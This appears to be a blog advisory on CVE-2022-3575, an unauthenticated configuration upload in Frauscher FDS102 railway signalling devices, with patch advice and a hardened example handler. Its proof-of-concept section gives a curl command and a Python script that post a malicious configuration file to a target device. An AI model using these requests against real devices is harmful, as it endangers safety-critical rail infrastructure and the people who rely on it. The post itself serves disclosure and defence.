In this post, we’re diving into CVE-2022-3575 — a real-world example of how a feature meant to make life easier for administrators ended up exposing critical Frauscher Sensortechnik GmbH railway safety devices to remote compromise, all thanks to a missing piece: authentication. We’ll break it down in plain language, show a proof of concept, and link to original sources for further reading.
Affected versions: Frauscher FDS102, from v2.8. up to v2.9.1
These devices are often found in railway signaling systems where reliability and security are a must.
What’s the Vulnerability?
The core problem: The FDS102 devices offer a configuration upload function over the network. Unfortunately, from version 2.8. to 2.9.1, this function does not enforce any authentication. Anyone who can reach the web interface can upload arbitrary files, including malicious code, directly to the device. This can lead to:
Real-World Impact
Why does this matter? FDS102 devices are used in safety-critical environments. If a threat actor uploads a backdoor or changes the logic, people and infrastructure are at risk.
Technical Details
The upload endpoint is typically accessible on a known port (e.g., TCP 80 or 443) using the device’s management web interface. No login is required. Here’s a simplified look at the weak logic:
```python
# Pseudo-code representation; not the actual device code
def upload_configuration(request):
    # Vulnerable: No authentication check at all!
    config_file = request.files['config']
    save_file('/etc/frauscher/configs/', config_file)
    apply_config('/etc/frauscher/configs/' + config_file.filename)
    return "Upload successful"
```
Proof of Concept: Exploiting CVE-2022-3575
Let’s say you know the IP address of an affected FDS102 device. You can exploit it in a few lines using curl, Python, or an HTTP tool.
Example 1: Curl Upload
Assume the upload endpoint is at /uploadConfig:
```bash
curl -X POST http://TARGET-IP/uploadConfig -F "config=@malicious_config.xml"
```
This doesn’t ask for any login — the malicious file is accepted and applied right away.
Example 2: Python Script
```python
import requests

url = "http://TARGET-IP/uploadConfig"
files = {'config': open('malicious_config.xml', 'rb')}
response = requests.post(url, files=files)
print(response.text)
```
If the device’s configuration parser isn’t securely written, you could even upload executable scripts or backdoors.
Mitigation
Official Fix:
Frauscher recommends updating to v2.9.2 or higher, where authentication is enforced for the config upload function.
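A hardened counterpart to the pseudo-code handler shown under Technical Details, added here as an illustration (it is not Frauscher's code and not from the original post): the upload is rejected unless a valid admin session is presented, and the file name is validated before anything is written. The `X-Session-Token` header, the session table, the role names, the size limit and the file-name policy are all assumptions.

```python
import hmac
import os
import re
import tempfile

MAX_CONFIG_BYTES = 1 << 20                           # assumed size limit (1 MiB)
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.xml")  # assumed file-name policy


def authenticate(headers, sessions):
    """Return the role bound to the presented session token, or None."""
    presented = headers.get("X-Session-Token", "")   # hypothetical header name
    role = None
    for token, token_role in sessions.items():
        # Constant-time comparison, and no early exit once a token matches.
        if hmac.compare_digest(presented.encode(), token.encode()):
            role = token_role
    return role


def upload_configuration(headers, filename, data, sessions, config_dir):
    """Authenticated version of the upload handler; returns (status, message)."""
    role = authenticate(headers, sessions)
    if role is None:
        return 401, "authentication required"        # the check the vulnerable handler lacks
    if role != "admin":
        return 403, "configuration upload requires the admin role"
    if not SAFE_NAME.fullmatch(filename):
        return 400, "invalid file name"              # rejects ../ and unexpected extensions
    if len(data) > MAX_CONFIG_BYTES:
        return 413, "configuration too large"
    with open(os.path.join(config_dir, filename), "wb") as fh:
        fh.write(data)
    return 200, "upload stored"                      # applying the config is left out here


def demo():
    """Replay constructed requests against a temporary directory."""
    sessions = {"constructed-admin-token": "admin", "constructed-viewer-token": "viewer"}
    admin = {"X-Session-Token": "constructed-admin-token"}
    viewer = {"X-Session-Token": "constructed-viewer-token"}
    with tempfile.TemporaryDirectory() as d:
        calls = [({}, "a.xml"), ({"X-Session-Token": "guess"}, "a.xml"), (viewer, "a.xml"), (admin, "../a.xml"), (admin, "a.xml")]
        return [upload_configuration(h, n, b"<config/>", sessions, d)[0] for h, n in calls]


if __name__ == "__main__":
    print(demo())  # [401, 401, 403, 400, 200]
```

Only the last constructed request, an admin session with a plain file name, reaches the write; every earlier one is refused before the file system is touched.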
Related References
- Frauscher Sensortechnik Security Advisory (pdf)
- VDE CERT - CVE-2022-3575
- NIST NVD CVE Entry
Key Takeaway
Ignoring authentication on any function that touches configuration (or uploads files!) is a major design flaw that attackers love. Always require authentication — especially on industrial equipment that keeps people safe.
If you’re running any version of the Frauscher FDS102 between 2.8. and 2.9.1, patch NOW.
*This post is exclusive and simplified for easy understanding and serves as a heads-up to anyone managing or auditing OT/ICS environments.*
Timeline
Published on: 11/02/2022 17:15:00 UTC